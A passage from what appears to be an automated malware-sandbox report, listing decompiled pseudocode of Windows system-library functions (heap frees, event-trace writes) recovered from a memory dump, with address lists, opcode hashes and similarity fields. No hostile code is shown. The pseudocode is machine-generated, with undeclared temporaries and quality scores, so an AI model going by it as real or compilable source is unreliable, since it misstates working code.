										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x1ad86c0; // 0x14c07b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x1ad86b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x1ad86bc;
													_t87 = 0x1ad86b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E019E9240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x1ad86c4;
												_t87 = 0x1ad86c0;
												L27:
												E01A19B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E01A3D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x1ad5388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x1ad538c = _t51;
						goto L6;
					}
				}
			}

0x019e9082
0x019e9083
0x019e9084
0x019e9085
0x019e9087
0x019e9096
0x019e9098
0x019e9098
0x019e909e
0x019e90a8
0x019e90e7
0x019e90e7
0x019e90aa
0x019e90b0
0x019e90b7
0x019e90bd
0x019e90dd
0x019e90e6
0x019e90bf
0x019e90bf
0x019e90c7
0x019e90cf
0x019e90f1
0x019e90f2
0x019e90f4
0x019e90f5
0x019e90f6
0x019e90f7
0x019e90f8
0x019e90f9
0x019e90fa
0x019e90fb
0x019e90fc
0x019e90fd
0x019e90fe
0x019e90ff
0x019e9100
0x019e9102
0x019e9107
0x019e910c
0x019e9110
0x019e9113
0x019e9115
0x019e9136
0x019e913f
0x019e9143
0x01a437e4
0x01a437e4
0x019e9117
0x019e9117
0x019e911d
0x00000000
0x019e911f
0x019e911f
0x019e9125
0x00000000
0x019e9127
0x019e912d
0x019e9130
0x019e9134
0x019e9158
0x019e915d
0x019e9161
0x019e9168
0x01a43715
0x019e916e
0x019e916e
0x019e9175
0x019e9177
0x019e917e
0x019e917f
0x019e9182
0x019e9182
0x019e9187
0x019e9187
0x019e918a
0x019e918d
0x019e918f
0x019e9192
0x019e9195
0x019e9198
0x019e9198
0x019e9198
0x019e919a
0x00000000
0x00000000
0x01a4371f
0x01a43721
0x01a43727
0x01a4372f
0x01a43733
0x01a43735
0x01a43738
0x01a4373b
0x01a4373d
0x01a43740
0x00000000
0x01a43746
0x01a43746
0x01a43749
0x00000000
0x01a4374f
0x01a4374f
0x01a43751
0x01a43757
0x01a43759
0x01a4375c
0x01a4375c
0x01a4375e
0x01a4375e
0x01a43761
0x01a43764
0x00000000
0x00000000
0x01a43766
0x01a43768
0x01a437a3
0x01a437a3
0x01a437a5
0x01a437a7
0x01a437ad
0x01a437b0
0x01a437b2
0x01a437bc
0x01a437c2
0x01a437c2
0x01a437b2
0x019e9187
0x019e9187
0x019e918a
0x019e918d
0x019e918f
0x019e9192
0x019e9195
0x00000000
0x019e9195
0x00000000
0x01a4376a
0x01a4376a
0x01a4376a
0x01a4376c
0x01a4376c
0x01a4376f
0x01a43775
0x00000000
0x00000000
0x01a43777
0x01a43779
0x01a43782
0x01a43787
0x01a43789
0x01a43790
0x01a43790
0x01a4378b
0x01a4378b
0x01a4378b
0x01a43792
0x01a43795
0x00000000
0x01a43795
0x00000000
0x01a43779
0x01a43798
0x00000000
0x01a43798
0x00000000
0x01a43768
0x01a4379b
0x01a4379b
0x01a43751
0x01a43749
0x00000000
0x01a43740
0x019e91a0
0x019e91a3
0x019e91a9
0x019e91b0
0x00000000
0x019e91b0
0x019e9187
0x019e91b4
0x019e91b4
0x019e91bb
0x019e91c0
0x019e91c5
0x019e91c7
0x01a437da
0x019e91cd
0x019e91cd
0x019e91cd
0x019e91d2
0x019e91d5
0x019e9239
0x019e9239
0x019e91d7
0x019e91db
0x019e91e1
0x019e91e7
0x019e91fd
0x019e9203
0x019e921e
0x019e9223
0x00000000
0x019e9205
0x019e9205
0x019e9208
0x019e920c
0x019e9214
0x019e9214
0x019e920c
0x019e91e9
0x019e91e9
0x019e91ee
0x019e91f3
0x019e91f3
0x019e91f3
0x019e91e7
0x00000000
0x00000000
0x00000000
0x019e9134
0x019e9125
0x019e911d
0x019e914e
0x019e90d1
0x019e90d1
0x019e90d3
0x019e90d6
0x019e90d8
0x00000000
0x019e90d8
0x019e90cf

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08a2572aa3d0e55258f242d57e4264ead69ab11d791d48c99217c09ceb1bdeb1
Instruction ID: 38cbd83aaa3aa5cf1454037a64523fa748eb8b37dea15b849470bf8980e96ae8
Opcode Fuzzy Hash: 08a2572aa3d0e55258f242d57e4264ead69ab11d791d48c99217c09ceb1bdeb1
Instruction Fuzzy Hash: 3701F4729026009FC32B8F1CD844B117FF9EB85326F214026E20A8B791C774DC41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01A7C450, Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E01A7C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E01A29910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E01A295B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E01A295D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L01A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E01A295D0();
				return L01A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}

0x01a7c458
0x01a7c45d
0x01a7c466
0x01a7c468
0x01a7c469
0x01a7c46a
0x01a7c46b
0x01a7c46e
0x01a7c46f
0x01a7c471
0x01a7c476
0x01a7c476
0x01a7c47c
0x01a7c47e
0x01a7c480
0x01a7c480
0x01a7c483
0x01a7c484
0x01a7c486
0x01a7c488
0x01a7c48f
0x01a7c491
0x01a7c493
0x01a7c493
0x01a7c48f
0x01a7c498
0x01a7c49e
0x01a7c4ad
0x01a7c4ad
0x01a7c4b2
0x01a7c4b4
0x01a7c4cd

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction ID: 90ab9ba62151f84a8fee096d2f39c37a3100d2345d25b773522919a9c82a3654
Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction Fuzzy Hash: 69019272240516BFE721AF69CD84E63FB6DFF647A5F004525F254425A1CB31ECA0CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01AB4015, Relevance: .0, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E01AB4015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E01A02280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E01A02280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x1ad86ac);
					E019EF900(0x1ad86d4, _t28);
					E019FFFB0(0x1ad86ac, _t28, 0x1ad86ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E019FFFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L01A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L01A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}

0x01ab401a
0x01ab401e
0x01ab4023
0x01ab4028
0x01ab4029
0x01ab402b
0x01ab402f
0x01ab4043
0x01ab4046
0x01ab4051
0x01ab4057
0x01ab405f
0x01ab4062
0x01ab4067
0x01ab406f
0x01ab407c
0x01ab407c
0x01ab408c
0x01ab408c
0x01ab4097

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18db13949a5f330746872f4700df3e6e4f4a83eee98501a674179542adb05b65
Instruction ID: d797157178e2d2aa949a05a4de94a894bff461d41bc9f8d66405a9f9b2d9ed8f
Opcode Fuzzy Hash: 18db13949a5f330746872f4700df3e6e4f4a83eee98501a674179542adb05b65
Instruction Fuzzy Hash: 2C01AC722019467FD211AB79CE84E53B7ACFF99760B000219F60883A52CB34EC11C6E4

Uniqueness

Uniqueness Score: -1.00%

Function 01AA14FB, Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E01AA14FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x1add360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E01A2FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E01A07D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E01A2B640(E01A29AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x01aa14fb
0x01aa14fb
0x01aa150a
0x01aa1514
0x01aa1519
0x01aa151b
0x01aa1526
0x01aa152c
0x01aa1534
0x01aa1537
0x01aa153a
0x01aa1545
0x01aa1557
0x01aa1547
0x01aa1550
0x01aa1550
0x01aa1562
0x01aa1563
0x01aa1565
0x01aa156a
0x01aa157f

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e5ad555b7612cdadd927d4beaa19862b1fe2fe977ee3531a31df458033192da
Instruction ID: 7f800b23efdfd3defde0212721a22daed36c8441ebe63458f5db277343f431c9
Opcode Fuzzy Hash: 6e5ad555b7612cdadd927d4beaa19862b1fe2fe977ee3531a31df458033192da
Instruction Fuzzy Hash: E101B171A01259AFCB10DFACD942EAEBBB8EF45710F44406AF955EB380DA70DA01CB94

Uniqueness

Uniqueness Score: -1.00%

Function 01AA138A, Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E01AA138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x1add360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E01A2FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E01A07D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E01A2B640(E01A29AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x01aa138a
0x01aa138a
0x01aa1399
0x01aa13a3
0x01aa13a8
0x01aa13aa
0x01aa13b5
0x01aa13bb
0x01aa13c3
0x01aa13c6
0x01aa13c9
0x01aa13d4
0x01aa13e6
0x01aa13d6
0x01aa13df
0x01aa13df
0x01aa13f1
0x01aa13f2
0x01aa13f4
0x01aa13f9
0x01aa140e

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b36809d565209d5a65941fe37f409d219cfb036643ecbcadefcbe0061047de97
Instruction ID: 5419a0b18b344e3fbd72de0055b799147955888bfb0390840c72ecc88a4c6690
Opcode Fuzzy Hash: b36809d565209d5a65941fe37f409d219cfb036643ecbcadefcbe0061047de97
Instruction Fuzzy Hash: 1C015E71A01219AFDB14DFA9D942EAEBBB8EF44710F404066F905EB280EB749A01CB94

Uniqueness

Uniqueness Score: -1.00%

Function 019E58EC, Relevance: .0, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E019E58EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x1add360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x19c5c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E019E5943() != 0 &&  *0x1ad5320 > 5) {
					E01A67B5E( &_v44, _t27);
					_t22 =  &_v28;
					E01A67B5E( &_v28, _t28);
					_t11 = E01A67B9C(0x1ad5320, 0x19cbf15,  &_v28, _t22, 4,  &_v76);
				}
				return E01A2B640(_t11, _t17, _v8 ^ _t29, 0x19cbf15, _t27, _t28);
			}

0x019e58fb
0x019e58fe
0x019e5906
0x019e590a
0x019e593c
0x019e593c
0x019e590c
0x019e590c
0x019e5911
0x00000000
0x019e5913
0x019e5913
0x019e5913
0x019e5911
0x019e591d
0x01a41035
0x01a4103c
0x01a4103f
0x01a41056
0x01a41056
0x019e593b

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86addf0305519c4a0710e92cd634ca59eef99e668e19f6c6544d3ac9b092708f
Instruction ID: 4d3bef811565842224e0c6e5ce85734df4bff13fc1ddb8305c63f9ec85247519
Opcode Fuzzy Hash: 86addf0305519c4a0710e92cd634ca59eef99e668e19f6c6544d3ac9b092708f
Instruction Fuzzy Hash: 8101F735B005059BE715EE68D9049EE77FCEF85134F860069EA0A97244DE30DD02C750

Uniqueness

Uniqueness Score: -1.00%

Function 019FB02A, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E019FB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E01A07D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E01A67016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}

0x019fb037
0x019fb039
0x019fb03b
0x019fb040
0x01a4a60e
0x00000000
0x00000000
0x01a4a61d
0x019fb04b
0x019fb04e
0x01a4a627
0x01a4a634
0x00000000
0x00000000
0x01a4a641
0x01a4a653
0x01a4a643
0x01a4a64c
0x01a4a64c
0x01a4a65b
0x00000000
0x00000000
0x00000000
0x01a4a66c
0x019fb057
0x019fb057
0x019fb057
0x019fb046
0x019fb046
0x00000000

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction ID: 3a046fa196d6cda3fb1d47c7084c8f4d912bada34c3b79f7dee8066b1e3a987b
Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction Fuzzy Hash: DC017172244980EFE3228B5CD944F76BBDCEB85750F0904A5FA1ACB655D628DC40C720

Uniqueness

Uniqueness Score: -1.00%

Function 01AB1074, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01AB1074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E01AB165E(__ebx, 0x1ad8ae4, (__edx -  *0x1ad8b04 >> 0x14) + (__edx -  *0x1ad8b04 >> 0x14), __edi, __ecx, (__edx -  *0x1ad8b04 >> 0x14) + (__edx -  *0x1ad8b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E01AAAFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E01A07D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E01A9FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}

0x01ab1074
0x01ab1080
0x01ab1082
0x01ab108a
0x01ab108f
0x01ab1093
0x01ab10ab
0x01ab10ab
0x01ab10c3
0x01ab10cf
0x01ab10e1
0x01ab10d1
0x01ab10da
0x01ab10da
0x01ab10e9
0x01ab10f5
0x01ab10f5
0x01ab10fe

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db152c2c197a451eb17bae689abb60e4e1d417e026dea388ab36b0e6ebccd588
Instruction ID: a7877d932bfb4b91e253f8b234652ce3116b5f8e0ba5897e1eee9b606bbea4a9
Opcode Fuzzy Hash: db152c2c197a451eb17bae689abb60e4e1d417e026dea388ab36b0e6ebccd588
Instruction Fuzzy Hash: EC014C726047829FC711DF68E980F5A7BE9BB84314F04C529F98683291DE34D440CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01A9FEC0, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E01A9FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x1add360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E01A2FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E01A07D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E01A2B640(E01A29AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x01a9fec0
0x01a9fec0
0x01a9fecf
0x01a9fed9
0x01a9fede
0x01a9fee0
0x01a9feeb
0x01a9fef3
0x01a9fef6
0x01a9fef9
0x01a9ff04
0x01a9ff16
0x01a9ff06
0x01a9ff0f
0x01a9ff0f
0x01a9ff21
0x01a9ff22
0x01a9ff24
0x01a9ff29
0x01a9ff3e

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 155d9ad7b2f7368efd151e78657a72d738b760de85635163aa24eb14a17664e3
Instruction ID: 596730bb189ba55c6b015aef4e8f6ccb19889e31ad4a6827d88803bae909e152
Opcode Fuzzy Hash: 155d9ad7b2f7368efd151e78657a72d738b760de85635163aa24eb14a17664e3
Instruction Fuzzy Hash: AE018F71E01219AFDB14DBA9D946FAFBBB8EF45700F004066F901EB280EA709A41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 01A9FE3F, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E01A9FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x1add360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E01A2FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E01A07D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E01A2B640(E01A29AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x01a9fe3f
0x01a9fe3f
0x01a9fe4e
0x01a9fe58
0x01a9fe5d
0x01a9fe5f
0x01a9fe6a
0x01a9fe72
0x01a9fe75
0x01a9fe78
0x01a9fe83
0x01a9fe95
0x01a9fe85
0x01a9fe8e
0x01a9fe8e
0x01a9fea0
0x01a9fea1
0x01a9fea3
0x01a9fea8
0x01a9febd

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15278c226a8100f63b6ee4f9f48c73423027b05f8bd6064d4deb568591a948bd
Instruction ID: e13cfeb79a7c66259a7bd4c7361ecdfa8969e799ec45d73451d243248ee248db
Opcode Fuzzy Hash: 15278c226a8100f63b6ee4f9f48c73423027b05f8bd6064d4deb568591a948bd
Instruction Fuzzy Hash: F2018471E01219AFDB14DFA9D846FAEBBB8EF44B10F004066F900EB281DA709941C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 01AB8ED6, Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E01AB8ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x1add360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E01A07D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E01A2B640(E01A29AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}

0x01ab8ed6
0x01ab8ee5
0x01ab8eed
0x01ab8ef0
0x01ab8efa
0x01ab8f03
0x01ab8f0c
0x01ab8f15
0x01ab8f24
0x01ab8f27
0x01ab8f31
0x01ab8f43
0x01ab8f33
0x01ab8f3c
0x01ab8f3c
0x01ab8f4e
0x01ab8f4f
0x01ab8f51
0x01ab8f56
0x01ab8f69

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11938f6d106cad4dba26de5c9c3fa576eb092bd502e6226ce318f66da978ac81
Instruction ID: 0ff8938f1a72a29b6d50d36819ca924ba764b51ac2f1b225261535d0c91c08e6
Opcode Fuzzy Hash: 11938f6d106cad4dba26de5c9c3fa576eb092bd502e6226ce318f66da978ac81
Instruction Fuzzy Hash: EC111E70E002599FDB04DFA8D541BAEBBF4FF08700F0442AAE919EB382E6349941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01AB8A62, Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E01AB8A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x1add360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E01A07D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E01A2B640(E01A29AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x01ab8a62
0x01ab8a71
0x01ab8a79
0x01ab8a82
0x01ab8a85
0x01ab8a89
0x01ab8a8c
0x01ab8a8f
0x01ab8a92
0x01ab8a95
0x01ab8a9f
0x01ab8ab1
0x01ab8aa1
0x01ab8aaa
0x01ab8aaa
0x01ab8abc
0x01ab8abd
0x01ab8abf
0x01ab8ac4
0x01ab8ada

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce9f4546512f665365e39ad3d8c754be38348228e816e92c3bf9e0d012e8ef26
Instruction ID: b3e6f76759809494f0dc5d73d3210543d0a0dd12638063392534f14d3b9ef8c9
Opcode Fuzzy Hash: ce9f4546512f665365e39ad3d8c754be38348228e816e92c3bf9e0d012e8ef26
Instruction Fuzzy Hash: 72012C71A0121DAFCB00DFA9D9819EEBBB8EF58710F50405AF905E7381EA34A901CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 019EDB60, Relevance: .0, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E019EDB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E019EDB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E019EE7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L019EE8B0(__ecx, _t14, 0xfff);
							L01A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}

0x019edb64
0x019edb66
0x019edb6b
0x019edbaa
0x019edb71
0x019edb76
0x019edb7a
0x019edba3
0x019edb7c
0x019edb87
0x019edb8b
0x01a44fa1
0x01a44fb3
0x01a44fb8
0x019edb91
